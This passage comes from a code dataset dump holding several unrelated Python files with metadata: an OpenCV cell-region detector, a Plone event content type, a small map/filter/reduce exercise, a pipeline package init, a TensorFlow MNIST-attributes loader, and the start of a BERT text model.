name = cellName\r\n print(\"Classifying regions...\")\r\n # For each boundary box.\r\n for box in bboxes:\r\n cellDict = {}\r\n regionDict = {}\r\n name = name_region(name)\r\n # Unpack and reshape the box to be 64x64x1.\r\n x1, y1, x2, y2, cx, cy = reshapeBox(box, (64, 64), sourceImg.shape)\r\n\r\n regionDict[\"coordinates\"] = [cx, cy]\r\n regionDict[\"pixels\"] = np.asarray(sourceImg[y1:y2, x1:x2])\r\n regionDict[\"ref\"] = reference[y1:y2, x1:x2]\r\n regionDict[\"name\"] = name\r\n regions.append(regionDict)\r\n\r\n # Map boundary box coordinates on to original hologram\r\n region = sourceImg[y1:y2, x1:x2]\r\n\r\n if classify:\r\n if flter.classify(region):\r\n cellDict[\"pixels\"] = np.asarray(sourceImg[y1:y2, x1:x2])\r\n\r\n cellDict[\"coordinates\"] = [cx, cy]\r\n cellDict[\"ref\"] = reference[y1:y2, x1:x2]\r\n cellDict[\"name\"] = name\r\n cells.append(cellDict)\r\n #cv2.rectangle(vis, (x1, y1), (x2, y2), (0, 255, 0), 1)\r\n cv2.rectangle(vis, (cx, cy), (cx, cy), (255, 0, 0), 5)\r\n elif show:\r\n cv2.rectangle(vis, (x1, y1), (x2, y2), (0, 255, 0), 1)\r\n cv2.rectangle(vis, (cx, cy), (cx, cy), (0, 0, 255), 5)\r\n print(\"regions:\", len(regions), \"cells:\", len(cells), \"extraction time:\", time.time() - t1, \"seconds.\")\r\n # Save and display normalized image with boundary boxes shown.\r\n if show:\r\n cv2.imwrite(imName, vis)\r\n cv2.resize(vis,(1920,1080),cv2.INTER_CUBIC)\r\n cv2.imshow(\"Bounding Box Data\", vis)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n # If displaying is not requested, save image with classified regions shown.\r\n #elif classify:\r\n #cv2.imwrite(imName, vis)\r\n return np.asarray(regions), np.asarray(cells), time.time()-t1, vis\r\n\r\n\r\n\"\"\"Wrapper function for extract_regions that uses a pre-determined parameter set for the MSER algorithm.\"\"\"\r\n\r\n\r\ndef get_regions(sourceImage, reference, cellName=\"a0\", imName=\"test.png\", flter=None, show=False, classify=True):\r\n # Parameter set for MSER algorithm. These parameters were found via numerical optimization.\r\n regions, cells, calcTime,vis = extract_regions(sourceImage, reference, params, imName, cellName=cellName, flter=flter, show=show,\r\n classify=classify)\r\n return regions, cells, calcTime,vis\r\n\r\n\r\n\"\"\"\r\n Function to reshape a box defined as (x1,y1,x2,y2) to a desired shape within the boundaries of an image.\r\n @param box: The box to reshape, must be a tuple or list in the format (x1,y2,x2,y2).\r\n @param shape: A tuple or list containing the desired shape of the box, I.E. (64,64).\r\n @param boundaryShape: The shape of the matrix that contains the box to be reshaped, an image in this case. \r\n\"\"\"\r\n\r\n\r\ndef reshapeBox(box, shape, boundaryShape):\r\n # Unpack the box.\r\n x1, y1, x2, y2 = box\r\n # h & w are the maximum x,y coordinates that the box is allowed to attain.\r\n h, w = boundaryShape\r\n # dw & dh are the desired width and height of the box.\r\n dw, dh = shape\r\n\r\n # Calculated the amount that the dimensions of the box will need to be changed\r\n heightExpansion = dh - abs(y1 - y2)\r\n widthExpansion = dw - abs(x1 - x2)\r\n\r\n # Force y1 to be the smallest of the y values. Shift y1 by half of the necessary expansion. Bound y1 to a minimum of 0.\r\n y1 = max(int(round(min(y1, y2) - heightExpansion / 2.)), 0)\r\n\r\n # Force y2 to be the largest of the y values. Shift y2 by half the necessary expansion. 
Bound y2 to a maximum of h.\r\n    y2 = min(int(round(max(y1, y2) + heightExpansion / 2.)), h)\r\n\r\n    # These two lines are a repeat of the above y1,y2 calculations but with x and w instead of y and h.\r\n    x1 = max(int(round(min(x1, x2) - widthExpansion / 2.)), 0)\r\n    x2 = min(int(round(max(x1, x2) + widthExpansion / 2.)), w)\r\n\r\n    # Calculate the center point of the newly reshaped box, truncated.\r\n    cx = x1 + abs(x1 - x2) // 2\r\n    cy = y1 + abs(y1 - y2) // 2\r\n\r\n    return x1, y1, x2, y2, cx, cy\r\n\r\n\r\n\"\"\"\r\n    Fast non-maximum suppression algorithm by Malisiewicz et al.\r\n    @param boxes: Array of boundary boxes to perform non-max suppression on.\r\n    @param overlapThresh: Acceptable overlap threshold. 0<=overlapThresh<=1.\r\n\"\"\"\r\n\r\n\r\ndef non_max_suppression_fast(boxes, overlapThresh):\r\n    # if there are no boxes, return an empty list\r\n    if len(boxes) == 0:\r\n        return []\r\n\r\n    # if the bounding boxes are integers, convert them to floats --\r\n    # this is important since we'll be doing a bunch of divisions\r\n    if boxes.dtype.kind == \"i\":\r\n        boxes = boxes.astype(\"float\")\r\n\r\n    # initialize the list of picked indexes\r\n    pick = []\r\n\r\n    # grab the coordinates of the bounding boxes\r\n    x1 = boxes[:, 0]\r\n    y1 = boxes[:, 1]\r\n    x2 = boxes[:, 2]\r\n    y2 = boxes[:, 3]\r\n\r\n    # compute the area of the bounding boxes and sort the bounding\r\n    # boxes by the bottom-right y-coordinate of the bounding box\r\n    area = (x2 - x1 + 1) * (y2 - y1 + 1)\r\n    idxs = np.argsort(y2)\r\n\r\n    # keep looping while some indexes still remain in the indexes\r\n    # list\r\n    while len(idxs) > 0:\r\n        # grab the last index in the indexes list and add the\r\n        # index value to the list of picked indexes\r\n        last = len(idxs) - 1\r\n        i = idxs[last]\r\n        pick.append(i)\r\n\r\n        # find the largest (x, y) coordinates for the start of\r\n        # the bounding box and the smallest (x, y) coordinates\r\n        # for the end of the bounding box\r\n        xx1 = np.maximum(x1[i], x1[idxs[:last]])\r\n        yy1 = np.maximum(y1[i], y1[idxs[:last]])\r\n        xx2 = np.minimum(x2[i], x2[idxs[:last]])\r\n        yy2 = np.minimum(y2[i], y2[idxs[:last]])\r\n\r\n        # compute the width and height of the bounding box\r\n        w = np.maximum(0, xx2 - xx1 + 1)\r\n        h = np.maximum(0, yy2 - yy1 + 1)\r\n\r\n        # compute the ratio of overlap\r\n        overlap = (w * h) / area[idxs[:last]]\r\n\r\n        # delete all indexes from the index list that have overlap above the threshold\r\n        idxs = np.delete(idxs, np.concatenate(([last], np.where(overlap > overlapThresh)[0])))\r\n\r\n    # return only the bounding boxes that were picked using the\r\n    # integer data type\r\n    return boxes[pick].astype(\"int\")\r\n\r\n\r\n\"\"\"\r\n    Function to use the MSER algorithm to detect regions in an image.\r\n    @param img: Input image for region detection.\r\n    @param params: Tuple containing all the parameters for the MSER algorithm.\r\n    @param display: Optional image for displaying the contours found by the MSER algorithm.\r\n\"\"\"\r\n\r\n\r\ndef MSER_blobs(img, params, mask=None, display=None):\r\n    # Unpack MSER parameters and create MSER object with them.\r\n\r\n    delta, minArea, maxArea, maxVariation, minDiversity, maxEvolution, areaThreshold, minMargin, edgeBlurSize = params\r\n\r\n    mser = cv2.MSER_create(delta, minArea, maxArea, maxVariation, minDiversity, maxEvolution, areaThreshold, minMargin, edgeBlurSize)\r\n\r\n    # Use MSER to detect regions within the given image.\r\n    if img.dtype == 'uint16':\r\n        img = np.divide(img, 256)\r\n        img = img.astype('uint8')\r\n    regions, _ = mser.detectRegions(img)\r\n\r\n    # Extract the hulls corresponding to the 
contours found by the MSER algorithm.\r\n hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions]\r\n\r\n # Optionally draw the hulls on a display image.\r\n if display is not None:\r\n try:\r\n display = cv2.cvtColor(display, cv2.COLOR_GRAY2BGR)\r\n except:\r\n print(\"Display image correctly formatted.\")\r\n print(len(hulls))\r\n cv2.polylines(display, hulls, 1, (0, 65000, 0))\r\n #cv2.imshow(\"Display Image with MSER hulls\", display)\r\n #cv2.waitKey(0)\r\n #cv2.destroyAllWindows()\r\n #cv2.imwrite(\"MSER Hulls.png\", display)\r\n hulls = np.asarray(hulls)\r\n if display is not None:\r\n return hulls,display\r\n return hulls\r\n\r\ndef name_region(name):\r\n dict = \"abcdefghijklmnopqrstuvwxyz\"\r\n if (name[0] == 'z'):\r\n name = \"a{}\".format(int(name[1:]) + 1)\r\n else:\r\n nextLetter = dict[dict.find(name[0]) + 1]\r\n name = \"{}{}\".format(nextLetter, int(name[1:]))\r\n return name\r\ndef process_folders(workingDirectory):\r\n gen = os.walk(workingDirectory)\r\n dirs = next(gen)[1]\r\n flter = rFilter.filter_CNN()\r\n processedImages = []\r\n for d in dirs:\r\n gen2 = os.walk(''.join([workingDirectory, '/', d]))\r\n refPath = ''.join([workingDirectory,'/',d,'/reference_image.png'])\r\n ref = cv2.imread(refPath,cv2.IMREAD_ANYDEPTH)\r\n for imgName in next(gen2)[2]:\r\n if \".png\" not in imgName or \"reference\" in imgName:\r\n continue\r\n fullFilePath = ''.join([workingDirectory,'/',d,'/',imgName])\r\n filePath = fullFilePath[:fullFilePath.rfind(\".png\")]\r\n print(\"PROCESSING\",fullFilePath)\r\n img = cv2.imread(fullFilePath,cv2.IMREAD_ANYDEPTH)\r\n regions, cells, t, _ = get_regions(img,ref,imName=\"detected.png\",flter=flter,classify=True)\r\n processedImages.append([regions,cells,t,filePath])\r\n return processedImages\r\ndef process_folder(workingDirectory):\r\n processedImages = []\r\n flter = rFilter.filter_CNN()\r\n ref = cv2.imread(''.join([workingDirectory,'/',\"reference_image.png\"]),cv2.IMREAD_ANYDEPTH)\r\n for imgName in os.listdir(workingDirectory):\r\n if \".png\" not in imgName or \"reference\" in imgName:\r\n continue\r\n fullFilePath = ''.join([workingDirectory,'/',imgName])\r\n print(\"PROCESSING\", fullFilePath)\r\n filePath = fullFilePath[:fullFilePath.rfind(\".png\")]\r\n if not os.path.exists(filePath):\r\n os.makedirs(''.join([filePath,'/docs']))\r\n os.makedirs(''.join([filePath,'/detected_image']))\r\n img = cv2.imread(fullFilePath, cv2.IMREAD_ANYDEPTH)\r\n regions, cells, t, _ = get_regions(img, ref, imName=''.join([filePath,'/detected_image/img.png']),flter=flter,classify=True)\r\n processedImages.append([regions, cells, t, filePath])\r\n return processedImages\r\n\r\ndef save_cell_data(workingDirectory, data):\r\n for entry in data:\r\n regions, cells, calcTime, filePath = entry\r\n with open(''.join([filePath,'/docs/cell_counts.txt']), 'w') as file:\r\n file.write(\"Total detected regions = {}\"\r\n \"\\nNumber of detected cells = {}\\n\"\r\n \"Computation Time = {}\".format(len(regions), len(cells),calcTime))\r\n with open(''.join([filePath,'/docs/cell_coordinates.txt']), 'w') as file:\r\n for cell in cells:\r\n file.write(\" ( {} {} )\\n\".format(cell[\"coordinates\"][0], cell[\"coordinates\"][1]))","sub_path":"Partners Healthcare/D3GUI/Machine_Learning/Lymphoma/Region_Detector.py","file_name":"Region_Detector.py","file_ext":"py","file_size_in_byte":14375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346147934","text":"from AccessControl import ClassSecurityInfo\nfrom 
archetypes.referencebrowserwidget.widget import ReferenceBrowserWidget\nfrom Products.Archetypes import atapi\nfrom Products.OrderableReferenceField import OrderableReferenceField\nfrom Products.OrderableReferenceField import OrderableReferenceWidget\nfrom Products.minaraad.config import PROJECTNAME\nfrom Products.minaraad.content.contacts import contacts_schema\nfrom Products.minaraad.content.interfaces import IUseContact\nfrom Products.minaraad.ThemeMixin import ThemeParentMixin\nfrom Products.minaraad.interfaces import IMREvent\nfrom Products.minaraad.Attachmentsmixin import Attachmentsmixin\nfrom Products.minaraad.ImageAttachmentsmixin import ImageAttachmentsmixin\nfrom Products.minaraad.utils import list_viewable\nfrom minaraad.projects.content.base_meeting import BaseMeeting\nfrom plone.app.blob.field import ImageField\nfrom zope.interface import implements\n\n\nschema = atapi.Schema((\n\n atapi.TextField(\n name='description',\n widget=atapi.TextAreaWidget(\n label='Description',\n label_msgid='minaraad_label_description',\n i18n_domain='minaraad',\n )\n ),\n\n atapi.StringField(\n name='subheader',\n widget=atapi.StringWidget(\n label='Subheader',\n label_msgid='minaraad_label_subheader',\n i18n_domain='minaraad',\n ),\n searchable=1\n ),\n\n atapi.TextField(\n name='goal',\n allowable_content_types=('text/html', 'text/plain'),\n widget=atapi.RichWidget(\n label='Goal',\n label_msgid='minaraad_label_goal',\n i18n_domain='minaraad',\n ),\n searchable=1,\n default_content_type='text/html',\n default_output_type='text/x-html-safe',\n ),\n\n atapi.StringField(\n name='location',\n widget=atapi.StringWidget(\n label='Location',\n label_msgid='minaraad_label_location',\n i18n_domain='minaraad',\n ),\n searchable=1\n ),\n\n atapi.DateTimeField(\n name='start_time',\n widget=atapi.CalendarWidget(\n label='Startdate',\n label_msgid='minaraad_label_startdate',\n i18n_domain='minaraad',\n ),\n required=1\n ),\n\n atapi.TextField(\n name='body',\n allowable_content_types=('text/html', 'text/plain'),\n widget=atapi.RichWidget(\n label='Body',\n label_msgid='minaraad_label_body',\n i18n_domain='minaraad',\n ),\n searchable=1,\n default_content_type='text/html',\n default_output_type='text/x-html-safe',\n ),\n\n atapi.BooleanField(\n name='subscriptionAllowed',\n default=True,\n widget=atapi.BooleanWidget(\n label='Subscription allowed',\n label_msgid='minaraad_label_subscription_allowed',\n description=(\n 'By default, subscription is allowed till one day before '\n 'start of the event. 
Uncheck this field to disallow '\n                'subscription immediately.'),\n            description_msgid='minaraad_description_subscription_allowed',\n            i18n_domain='minaraad',\n        ),\n    ),\n\n    ImageField(\n        name='foto',\n        widget=atapi.ImageWidget(\n            label=\"Photo\",\n            label_msgid='minaraad_label_foto',\n            i18n_domain='minaraad',\n            visible=False\n        ),\n        storage=atapi.AttributeStorage(),\n        sizes={'foto': (300, 300)}\n    ),\n\n    OrderableReferenceField(\n        name='contact',\n        vocabulary_display_path_bound=\"-1\",\n        widget=OrderableReferenceWidget(\n            visible=False,\n            label='Contact',\n            label_msgid='minaraad_label_contact',\n            i18n_domain='minaraad',\n            base_query={\n                'sort_on': 'sortable_title',\n            },\n        ),\n        allowed_types=('ContactPerson', ),\n        multiValued=1,\n        relationship='mrevent_contact'\n    ),\n\n    atapi.ReferenceField(\n        name='relatedDocuments',\n        vocabulary_display_path_bound=\"-1\",\n        widget=ReferenceBrowserWidget(\n            label='Related Documents',\n            label_msgid='minaraad_label_related_documents',\n            description=\"Related and published digibib documents and files\",\n            description_msgid=\"minaraad_help_related_documents\",\n            i18n_domain='minaraad',\n            # ATReferenceBrowser specific additions:\n            startup_directory='/',\n            restrict_browsing_to_startup_directory=0,\n            only_for_review_states=('published', ),\n            show_review_state=1,\n            allow_search=1,\n            allow_browse=1,\n            show_indexes=0,\n            force_close_on_insert=0,\n        ),\n        allowed_types=('Document', 'File', 'FileAttachment',\n                       'Advisory', 'Study', 'MREvent'),\n        multiValued=True,\n        relationship='related_documents'\n    ),\n\n),\n)\n\nMREvent_schema = atapi.OrderedBaseFolderSchema.copy() + \\\n    schema.copy() + \\\n    ImageAttachmentsmixin.schema.copy() + \\\n    contacts_schema.copy()\n\nMREvent_schema.moveField('coordinator', after=\"subscriptionAllowed\")\nMREvent_schema.moveField('authors', after=\"coordinator\")\n\n\nclass MREvent(Attachmentsmixin, BaseMeeting, ThemeParentMixin):\n    \"\"\"\n    \"\"\"\n    implements(IMREvent, IUseContact)\n    security = ClassSecurityInfo()\n    archetype_name = 'MREvent'\n    portal_type = 'MREvent'\n    _at_rename_after_creation = True\n    schema = MREvent_schema\n\n    def getRelatedDocuments(self):\n        \"\"\"Get the documents from the relatedDocuments field.\n\n        Only get those that the user is allowed to access.\n\n        Adapted from\n        Products/CMFPlone/skins/plone_scripts/computeRelatedItems.py\n        \"\"\"\n        docs = self.getField('relatedDocuments').get(self)\n        return list_viewable(docs)\n\natapi.registerType(MREvent, PROJECTNAME)\n","sub_path":"src/Products.minaraad/Products/minaraad/content/MREvent.py","file_name":"MREvent.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519344209","text":"from functools import reduce\r\n\r\ndef sayılar(sayı,sayı1):\r\n    a=list(range(sayı,sayı1))\r\n\r\n    print(list( map(lambda x : x*2, filter(lambda x : x%2!=0,a)))) # multiplied the odd numbers by two\r\n    print(reduce(lambda x,y : x+y , a)) # summed the numbers in the list\r\nsayı =int(input(\"enter a number:\"))\r\nsayı1 =int(input(\"enter a number:\"))\r\nsayılar(sayı,sayı1)\r\n","sub_path":"2.ödev tekleri ikiyle çarp.py","file_name":"2.ödev tekleri ikiyle çarp.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"26647645","text":"# The MIT License (MIT)\n# Copyright (c) 2019 Ian Buttimer\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation 
files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom .csv_pipelines import (\n execute_csv_to_postgres_pipeline,\n execute_csv_currency_to_postgres_pipeline\n)\nfrom .plot_pipelines import (\n execute_postgres_to_plot_pipeline,\n execute_file_ip_postgres_to_plot_pipeline,\n execute_file_ip_sql_to_plot_pipeline,\n)\nfrom .create_pipelines import (\n execute_create_sales_data_postgres_pipeline,\n execute_create_currency_data_postgres_pipeline,\n)\nfrom .clean_pipelines import (\n execute_clean_sales_data_postgres_pipeline,\n execute_clean_currency_data_postgres_pipeline\n)\nfrom .currency_pipelines import execute_currency_to_postgres_pipeline\n\n# if somebody does \"from sales_journal.pipelines import *\", this is what they will\n# be able to access:\n__all__ = [\n 'execute_csv_to_postgres_pipeline',\n 'execute_csv_currency_to_postgres_pipeline',\n\n 'execute_postgres_to_plot_pipeline',\n 'execute_file_ip_postgres_to_plot_pipeline',\n 'execute_file_ip_sql_to_plot_pipeline',\n\n 'execute_create_sales_data_postgres_pipeline',\n 'execute_create_currency_data_postgres_pipeline',\n\n 'execute_clean_sales_data_postgres_pipeline',\n 'execute_clean_currency_data_postgres_pipeline',\n\n 'execute_currency_to_postgres_pipeline',\n]\n","sub_path":"sales_journal/pipelines/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422516053","text":"#\n# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nr\"\"\"Provides data for the mnist with attributes dataset.\n\nProvide data loading utilities for an augmented version of the\nMNIST dataset which contains the following attributes:\n 1. Location (digits are translated on a canvas and placed around\n one of four locations/regions in the canvas). Each location\n is a gaussian placed at four quadrants of the canvas.\n 2. Scale (We vary scale from 0.4 to 1.0), with two gaussians\n placed at 0.5 +- 0.1 and 0.9 +- 0.1 repsectively.\n 3. 
Orientation: we vary orientation from -90 to +90 degrees,\n sampling actual values from gaussians at +30 +- 10 and\n -30 +-10. On a third of the occasions we dont orient the\n digit at all which means a rotation of 0 degrees.\n\nThe original data after transformations is binarized as per the\nprocedure described in the following paper:\n\n Salakhutdinov, Ruslan, and Iain Murray. 2008. ``On the Quantitative Analysis of\n Deep Belief Networks.'' In Proceedings of the 25th International Conference on\nAuthor: vrama@\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport tensorflow as tf\n\nfrom tensorflow.contrib.slim.python.slim.data import dataset\nfrom tensorflow.contrib.slim.python.slim.data import tfexample_decoder\n\n# Only provides option to load the binarized version of the dataset.\n_FILE_PATTERN = 'binarized_True_replication_1_retrieval_at_1.tf_record'\n\n# TODO(vrama): Update\n_DATASET_DIR = (\n '${PWD}/data/mnist_with_attributes/'\n)\n\n_SPLIT_TYPE = 'retrieval'\n\n_SPLITS_TO_SIZES = {'retrieval': 70000}\n\n_ITEMS_TO_DESCRIPTIONS = {\n 'image': 'A [64 x 64 x 1] grayscale image.',\n 'labels': 'Labels induced on latent states used to generate the image.',\n 'latents': 'Latents used to generate the image.'\n}\n\n# There are four labels in the dataset corresponding to\n# shape, size, orientation, and location of the object.\n# 10 classes for digits (0-9),\n# 2 classes for size (big, small)\n# 3 classes for orientation (clockwise, center, counterclockwise)\n# 4 classes for location (top-left, top-right, bottom-left, bottom-right)\n_NUM_CLASSES_PER_ATTRIBUTE = (10, 2, 3, 4)\n\n_NUM_LATENTS = 5\n\n\ndef get_split(split_name='retrieval',\n dataset_dir=None,\n num_classes_per_attribute=None):\n \"\"\"Gets a dataset tuple with instructions for reading 2D shapes data.\n\n Args:\n split_name: A train/test split name.\n dataset_dir: The base directory of the dataset sources.\n num_classes_per_attribute: The number of labels for the classfication\n problem corresponding to each attribute. For example, if the first\n attribute is \"shape\" and there are three possible shapes, then\n then provide a value 3 in the first index, and so on.\n\n Returns:\n A `Dataset` namedtuple.\n metadata: A dictionary with some metadata about the dataset we just\n constructed.\n\n Raises:\n ValueError: if `split_name` is not a valid train/test split.\n \"\"\"\n if split_name not in _SPLITS_TO_SIZES:\n raise ValueError('split name %s was not recognized.' 
% split_name)\n\n  if num_classes_per_attribute is None:\n    num_classes_per_attribute = _NUM_CLASSES_PER_ATTRIBUTE\n\n  if dataset_dir is None:\n    dataset_dir = _DATASET_DIR\n\n  file_pattern = os.path.join(dataset_dir, _FILE_PATTERN)\n\n  keys_to_features = {\n      'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''),\n      'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'),\n      'labels': tf.FixedLenFeature([len(num_classes_per_attribute)], tf.int64),\n      'latents': tf.FixedLenFeature([_NUM_LATENTS], tf.float32),\n  }\n\n  items_to_handlers = {\n      'image': tfexample_decoder.Image(shape=[64, 64, 3]),\n      'labels': tfexample_decoder.Tensor('labels'),\n      'latents': tfexample_decoder.Tensor('latents'),\n  }\n\n  decoder = tfexample_decoder.TFExampleDecoder(keys_to_features,\n                                               items_to_handlers)\n\n  metadata = {\n      'num_classes_per_attribute': num_classes_per_attribute,\n      'split_type': _SPLIT_TYPE\n  }\n\n  return dataset.Dataset(\n      data_sources=file_pattern,\n      reader=tf.TFRecordReader,\n      decoder=decoder,\n      num_samples=_SPLITS_TO_SIZES[split_name],\n      items_to_descriptions=_ITEMS_TO_DESCRIPTIONS), metadata\n","sub_path":"datasets/mnist_attributes/affine_mnist_retrieval_set.py","file_name":"affine_mnist_retrieval_set.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98872309","text":"# import tensorflow as tf\n# import numpy as np\n# from tf_utils.bert_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # BERT\n\n# # from tf_utils.eltra_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # Electra\n# # from tf_utils.modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # ALBERT\n# from tensorflow.contrib.layers.python.layers import initializers\n# from tf_utils.crf_utils import rnncell as rnn\nfrom config import Config\nconfig = Config()\nimport tensorflow as tf\nimport numpy as np\n# from tf_utils.bert_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # BERT\nif config.pretrain_model == 'albert':\n    from tf_utils.modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # ALBERT\nelif config.pretrain_model =='nezha':\n    from tf_utils.nezha import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # Nezha\n    # from tf_utils.modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # ALBERT\nelse:\n    from tf_utils.bert_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # BERT\nfrom tensorflow.contrib.crf import crf_log_likelihood, viterbi_decode\nfrom tensorflow.contrib.layers.python.layers import initializers\nfrom tf_utils.crf_utils import rnncell as rnn\nfrom tf_utils.bert_modeling import layer_norm\nfrom focal_loss import focal_loss\n\n# import memory_saving_gradients\n# tf.__dict__[\"gradients\"] = memory_saving_gradients.gradients_memory\n# # For layers with multiple optimization targets such as the CRF, memory_saving_gradients is buggy, so keep it commented out.\n\n\n\nclass Model:\n\n    def __init__(self, config):\n        self.config = config\n        self.input_x_word = tf.placeholder(tf.int32, [None, None], name=\"input_x_word\")\n        self.input_x_len = tf.placeholder(tf.int32, name='input_x_len')\n        self.input_mask = tf.placeholder(tf.int32, [None, None], name='input_mask')\n        self.label = tf.placeholder(tf.int32, [None], name='label') # sentiment label\n        self.segment_ids = tf.placeholder(tf.int32, [None, None], 
name='segment_ids') # segment label\n        self.keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')\n        self.is_training = tf.placeholder(tf.bool, None, name='is_training')\n\n        self.relation_num = config.relation_num\n        self.initializer = initializers.xavier_initializer()\n\n        self.init_embedding(bert_init=True)\n        output_layer = self.word_embedding\n        gru_num=int(self.config.embed_dense_dim/2)\n        hidden_size = get_shape_list(output_layer)[-1]\n        if config.addcnn:\n            ## text CNN stacked on top of BERT\n            num_filters = config.num_filters\n            kernel_size = config.kernel_size # convolution kernel size\n            output_layer = tf.layers.conv1d(output_layer, num_filters, kernel_size) #[batch,(seq_length - kernel_size + 1),num_filters]\n            hidden_size = num_filters\n            pool_size = config.sequence_length - kernel_size + 1\n            # each convolution kernel yields a vector of size (seq_length - kernel_size + 1)\n        elif config.addgru:\n            GRU_cell_fw = tf.contrib.rnn.GRUCell(gru_num,name='fw_tr') # tunable parameter\n            # backward\n            GRU_cell_bw = tf.contrib.rnn.GRUCell(gru_num,name='bw_tr') # tunable parameter\n            output_layer_1 = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw,\n                                                             cell_bw=GRU_cell_bw,\n                                                             inputs=output_layer,\n                                                             sequence_length=None,\n                                                             dtype=tf.float32)[0]\n            output_layer_1=tf.concat([output_layer_1[0],output_layer_1[1]],axis=-1)\n            # GRU_cell_fw_1 = tf.contrib.rnn.GRUCell(gru_num, name='fw_tr',reuse=True) # tunable parameter\n            # # backward\n            # GRU_cell_bw_1 = tf.contrib.rnn.GRUCell(gru_num, name='fw_tr',reuse=True) # tunable parameter\n            # output_layer_2 = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw_1,\n            #                                                  cell_bw=GRU_cell_bw_1,\n            #                                                  inputs=output_layer_1,\n            #                                                  sequence_length=None,\n            #                                                  dtype=tf.float32)[0]\n            # output_layer_2 = tf.concat([output_layer_2[0], output_layer_2[1]], axis=-1)\n            # # output_layer_3 = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw,\n            # #                                                  cell_bw=GRU_cell_bw,\n            # #                                                  inputs=output_layer_2,\n            # #                                                  sequence_length=None,\n            # #                                                  dtype=tf.float32)[0]\n            # # output_layer_3 = tf.concat([output_layer_3[0], output_layer_3[1]], axis=-1)\n            # output_layer = tf.concat([output_layer_1,output_layer_2],axis=-1)\n            output_layer =output_layer_1\n            pool_size = config.sequence_length\n            hidden_size = output_layer.shape[-1]\n        # elif config.addbilstm== True:\n        #     # some hyper_parameters\n        #     used = tf.sign(tf.abs(self.input_x_word))\n        #     length = tf.reduce_sum(used, reduction_indices=1)\n        #     self.lengths = tf.cast(length, tf.int32)\n        #     self.batch_size = tf.shape(self.input_x_word)[0]\n        #     self.num_steps = tf.shape(self.input_x_word)[-1]\n        #     # lstm_inputs = tf.nn.dropout(output_layer, config.dropout)\n        #     # bi-directional lstm layer\n        #     lstm_cell = {}\n        #     for direction in [\"forward\", \"backward\"]:\n        #         with tf.name_scope(direction):\n        #             lstm_cell[direction] = rnn.CoupledInputForgetGateLSTMCell(\n        #                 256,\n        #                 use_peepholes=True,\n        #                 initializer=self.initializer,\n        #                 state_is_tuple=True)\n        #     outputs= tf.nn.bidirectional_dynamic_rnn(lstm_cell[\"forward\" ],lstm_cell[\"backward\"],output_layer,dtype=tf.float32,sequence_length=self.lengths)[0]\n        #     model_outputs_1=tf.concat(outputs, axis=2)\n        #     outputs= tf.nn.bidirectional_dynamic_rnn(lstm_cell[\"forward\" ],lstm_cell[\"backward\"],model_outputs_1,dtype=tf.float32,sequence_length=self.lengths)[0]\n        #     model_outputs_2=tf.concat(outputs, axis=2)\n        #     outputs= tf.nn.bidirectional_dynamic_rnn(lstm_cell[\"forward\" ],lstm_cell[\"backward\"],model_outputs_2,dtype=tf.float32,sequence_length=self.lengths)[0]\n        #     model_outputs_3 = tf.concat(outputs, axis=2)\n        #     output_layer=tf.concat([ model_outputs_1, model_outputs_2, model_outputs_3], axis=-1)\n        #     pool_size = self.config.sequence_length\n        #     hidden_size = 
